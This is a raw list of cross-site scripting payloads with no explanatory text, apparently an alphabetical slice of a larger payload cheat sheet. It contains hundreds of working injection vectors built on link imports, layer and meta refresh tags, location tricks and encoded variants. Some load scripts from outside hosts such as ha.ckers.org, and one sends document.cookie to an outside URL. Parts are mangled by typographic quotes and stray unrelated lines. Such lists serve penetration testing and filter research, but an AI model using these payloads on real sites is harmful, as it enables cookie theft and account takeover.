<keygen autofocus onfocus=alert(104)>
<keygen autofocus onfocus=alert(1)>//INJECTX
<keygen id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>”>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
“>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
“>/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
<kukux onanimationend=alert(34)>
<kukux style=animation-name:n onanimationend=alert(43)>
<kukux style=display:block;position:absolute;background-color:red;font-size:999px onmouseenter=alert(document.domain)></kukux>
l= 0 || ‘str’,m= 0 || ‘sub’,x= 0 || ‘al’,y= 0 || ‘ev’,g= 0 || ‘tion.h’,f= 0 || ‘ash’,k= 0 || ‘loca’,d= (k) + (g) + (f),a
<label class=”<% confirm(1) %>”>
language=vbs>test</b>
<LAYER id=XSS SRC=”http://xxxx.com/scriptlet.html"></LAYER>
<LAYER SRC=”http://ha.ckers.org/
<;LAYER SRC=”;http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
<LAYER SRC=”http://ha.ckers.org/scriptlet.html"></LAYER>
<Layer+src=”http://localhost">
<LAYER src=”http://xss.ha.ckers.org/a.js"></layer>
<LAYER SRC=”http://xss.ha.ckers.org/a.js"></layer>
<LAYER SRC=”javascript:document.vulnerable=true;”></LAYER>
<LAYER SRC=”%(scriptlet)s”></LAYER>
{}let{}={}
let=[`const`];
let=[`const`];(_=_=>let+`ructor`)[_`${_=`ale`}`](_+`rt(let)`)``
let:let{let:[x=1]}=[alert(1)]
(_=_=>let+`ructor`)
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
<limited_xss_point>eval(get(‘http://xxx.com/x'));</limited_xss_point>
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
<limited_xss_point>loads(‘http://xxx.com/x');</limited_xss_point>
<link%20rel=”import”%20href=”?bypass=<script>confirm(document.domain)</script>”>
<link%20rel=import%20href=http://avlidienbrunn.se/test.php>
<link%20rel=import%20href=https:html5sec.org/test.swf
<link href=”http://host/xss.css">
<link href=”javascript:alert(1)” rel=”next”>
<link+id=p1+rel=import+href=/dom/sinks.html>&name=<img/src/onerror=alert(1)>
<link rel=”import”
<link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
<link rel=import href=angular.html><p ng-app>{{constructor.constructor(‘alert(18)’)()}}
<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! —
<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<! — alert(21)// →</svg><script>0</script>
<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(19)</script></form>
<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><! — alert(1)</script></form>
<link rel=import href=”/bypass/path/<script>alert(16)</script>”>
<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>
<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`20`%></script>
<link rel=import href=/bypass/usercontent/icon.jpg>
<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor(‘alert(1)’)()}}
<link rel=import href=”data:,%%0D3Cscript>alert(68)%%0D3C%%0D2Fscript>
<link rel=import href=data:text/html;base64,PHNjcmlwdD5wb3B1cD0xOzwvc2NyaXB0Pg==>
<link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
<link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
“><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
<link rel=”import” href=”data:text/html&comma;&lt;script&gt;alert(document.domain)&lt ;&sol;script&gt;
<link rel=import href=”data:text/html,<script>alert(1)</script>
“><link rel=import href=data:text/html,<script>alert(1)</script>
<link rel=”import” href=”data:x,<script>alert(1)</script>
<link rel=import href=//evil>
<link rel=import href=/%http://0d-z.exeye.io >
<link rel=import href=/upload/…..>
<link rel=”import” href=”//xss.cx”>
<link rel=import onerror=confirm(1)>
<link/rel=prefetch&#10import
<link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgnQHFhYicpPC9zY3JpcHQ+>
<link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
<link rel=”prefetch” href=”http://xss.cx">
<link/rel=prefetchimport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel=’preload’ href=’#’ as=’script’ onload=’confirm(203)’>
<link rel=’preload’ href=’#’ as=’script’ onload=’confirm(domain)’>
<link rel=stylesheet href=//attacker/test.css>
<link rel=stylesheet href=’data:,?*%7bx:expression(alert(1))%7D’ >
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d>
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
<link rel=stylesheet href=’data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D’ >
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css">
“><link rel=”stylesheet” href=”http://8ant.org/asdfqwer.css"><"
<;LINK REL=”;stylesheet”; HREF=”;http://ha.ckers.org/xss.css";>;
<LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
<link rel = “stylesheet” href =”http://www.xxx.com/atack.css">
<LINK REL=”stylesheet” HREF=”http://xss.cx/xss.css">
<LINK REL=”stylesheet” HREF=”http://xxxx.com/xss.css">
<LINK REL=”stylesheet” href=”javascript:alert(‘XlSS’);”>
<;LINK REL=”;stylesheet”; HREF=”;javascript:alert(‘;XSS’;);”;>;
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
<LINK REL=”stylesheet” HREF=”javascript:alert(XSS);”>
<LINK REL=”stylesheet” HREF=”javascript:confirm(document.location);”>
<link rel=”stylesheet” href=”javascript:document.vulnerable=true;”>
<link REL=”stylesheet” HREF=”javascript:document.vulnerable=true;”>
<LINK REL=”stylesheet” HREF=”javascript:javascript:alert(1);”>
<listener event=”load” handler=”#y” xmlns=”http://www.w3.org/2001/xml-events" observer=”x”/>
<listing>&lt;img src=1 onerror=alert(1) &gt;</listing>
<listing>&ltimg src=x onerror=confirm(1)&gt</listing>
<li style=”color:rgb(‘’0,0,&#0;javascript:expression(confirm(1))”>XSS</li>
<li style=list-style:url() onerror=alert(1)>
<li style=list-style:url() onerror=alert(1)></li>
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<LoadingMovMinDuration>3</LoadingMovMinDuration>
<LoadingMovPercentToLoad>50</LoadingMovPercentToLoad>
<LoadingMovURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</LoadingMovURL>
<! — localhost/xss.php?q=PAYLOAD →
location+=[]
location=’&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'
=location=a?jav\x41script\x3aconfirm\x28a3ZDresearcha?\x29a2>ZDresearch
location.assign`javascript:alert(1)`
Location Based Payloads V Part I
Location.hash[1] = :
Location.hash[2]= (
Location.hash[3] = )
(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src=”x:x” onerror=”if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}”>
;location.href=’http://site’;//
“;location.href='http://site';//
location.href`javascript:alert(1)`
location=`http://google.com/csi ?${escape(document.cookie)}`;
location=/http/.source+/:/.source[0]+/\//.source[1]+/\//.source[1]+/google.com/.source
location=’http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com'
location=’javasc&#114ipt&#58alert&#40~1&#41'
‘;location=’javascript://’%2Blocation.hash;’
location=’javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)’
location=’javascript:%61%6c%65%72%74%28%31%29'
location=’javascript:alert(0)’;
location`javascript:alert(1)`
location=’javascript:ale’+’rt(12)’;
location=javascript:confirm(0);.
location=’javascript://\u2028alert(1)’;
location=location.hash
“;location=location.hash)//#0={};alert(0)
location=location.hash //FF only
location=location.hash.slice(1);
location=location.hash.slice(1); //avoid the #
“;location=name;//
location=name;
location=name
location=name//’,’javascript:alert(1)’);
location.reload`javascript:alert(1)`
location.replace`javascript:alert(1)`
location.search, tagName, nodeName, outerHTML
location=unescape`%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D`
Lol:Function`alert(1)```````````
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
lol video<!V”href=javascript:alert(1) style=font-size:50px;
lol video<!Vhref=javascript:alert(1) style=font-size:50px;display:block;color:transparent;
( = &lpar;
&lt;
&lt
&LT;
&LT
&lt;!&#91;endif&#93; — &gt;
&lt;! — &#91;if gte IE 4&#93;&gt;
&lt;A HREF=\”//google\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//0102&#46;0146&#46;0007&#46;00000223/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//1113982867/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//66&#46;102&#46;7&#46;147/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//google&#46;com/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//google&#58;ha&#46;ckers&#46;org\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//ha&#46;ckers&#46;org@google\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\”&gt;XSS&lt;/A&gt;
&lt;A HREF=\”http&#58;//www&#46;google&#46;com&#46;/\”&gt;XSS&lt;/A&gt;
&lt;a href="http://i.imgur.com/b7sajuK.jpg" download&gt;<a href=”http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a>&lt;/a&gt;
&lt;A HREF=\”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’\”&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=\”//www&#46;google&#46;com/\”&gt;XSS&lt;/A&gt;
&lt;BASE HREF=\”javascript&#058;alert(‘XSS’);//\”&gt;
&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
&lt;BGSOUND SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;BODY BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\”XSS\”)&gt;
&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
&lt;BODY ONLOAD=alert(‘XSS’)&gt;
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
&lt;BR SIZE=\”&{alert(‘XSS’)}\”&gt;
&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
&lt;/br style=a:expression(alert())&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;DIV STYLE=\”background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\”&gt;
&lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;
&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
&lt;DIV STYLE=\”width&#58; expression(alert(‘XSS’));\”&gt;
&lt;? echo(&apos;&lt;SCR)&apos;;
&lt;? echo(‘&lt;SCR)’;
&lt;EMBED SRC=\”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
&lt;EMBED SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
&lt;! — #exec cmd=\”/bin/echo ‘&lt;SCR’\” — &gt;&lt;! — #exec cmd=\”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’\” — &gt;
&lt;! — #exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot; — &gt;&lt;! — #exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/FRAMESET&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
&lt;HTML&gt;&lt;BODY&gt;
&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\”xss\” implementation=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
&lt;HTML xmlns:xss&gt;
&lt;! — [if gte IE 4]&gt;
&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
&lt;IFRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/IFRAME&gt;
&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
&lt;IMG DYNSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG \”\”\”&gt;&lt;SCRIPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;\”&gt;
&lt;IMG LOWSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
&lt;IMG SRC=\”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\”&gt;
&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=`javascript&#058;alert(\”RSnake says, ‘XSS’\”)`&gt;
&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
&lt;IMG SRC=\”javascript&#058;alert(‘XSS’)\”
&lt;IMG SRC=\” javascript&#058;alert(‘XSS’);\”&gt;
&lt;IMG SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
&lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;
&lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt;
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
&lt;IMG SRC=\”jav&#x09;ascript&#058;alert(‘XSS’);\”&gt;
&lt;IMG SRC=\”jav&#x0A;ascript&#058;alert(‘XSS’);\”&gt;
&lt;IMG SRC=\”jav&#x0D;ascript&#058;alert(‘XSS’);\”&gt;
&lt;IMG SRC=\”livescript&#058;&#91;code&#93;\”&gt;
&lt;IMG SRC=\”mocha&#58;&#91;code&#93;\”&gt;
&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
&lt;IMG SRC=’vbscript&#058;msgbox(\”XSS\”)’&gt;
&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
&lt;img src=xx:x onerror=confirm(1)&gt;<script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
&lt;IMG STYLE=\”xss&#58;expr/*XSS*/ession(alert(‘XSS’))\”&gt;
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
&lt;?import namespace=\”t\” implementation=\”#default#time2\”&gt;
&lt;INPUT TYPE=\”IMAGE\” SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;label class=”&lt;% confirm(1) %&gt;”&gt;
&lt;LAYER SRC=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/LAYER&gt;
&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;LINK REL=\”stylesheet\” HREF=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;css\”&gt;
&lt;LINK REL=\”stylesheet\” HREF=\”javascript&#058;alert(‘XSS’);\”&gt;
&lt;&lt;SCRIPT>alert(“XSS”);//&lt;&lt;/SCRIPT>
&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
&lt;&lt;SCRIPT&gt;alert(\”XSS\”);//&lt;&lt;/SCRIPT&gt;
&lt;META HTTP-EQUIV=\”Link\” Content=\”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\”&gt;
&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;
&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”
&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”
&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript&#058;alert(‘XSS’);\”&gt;
&lt;META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;\”&gt;
&lt;OBJECT classid=clsid&#58;ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
&lt;OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/OBJECT&gt;
&lt;SCRIPT a=\”&gt;’&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT \”a=’&gt;’\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\”&gt;\” ‘’ SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;a=/XSS/
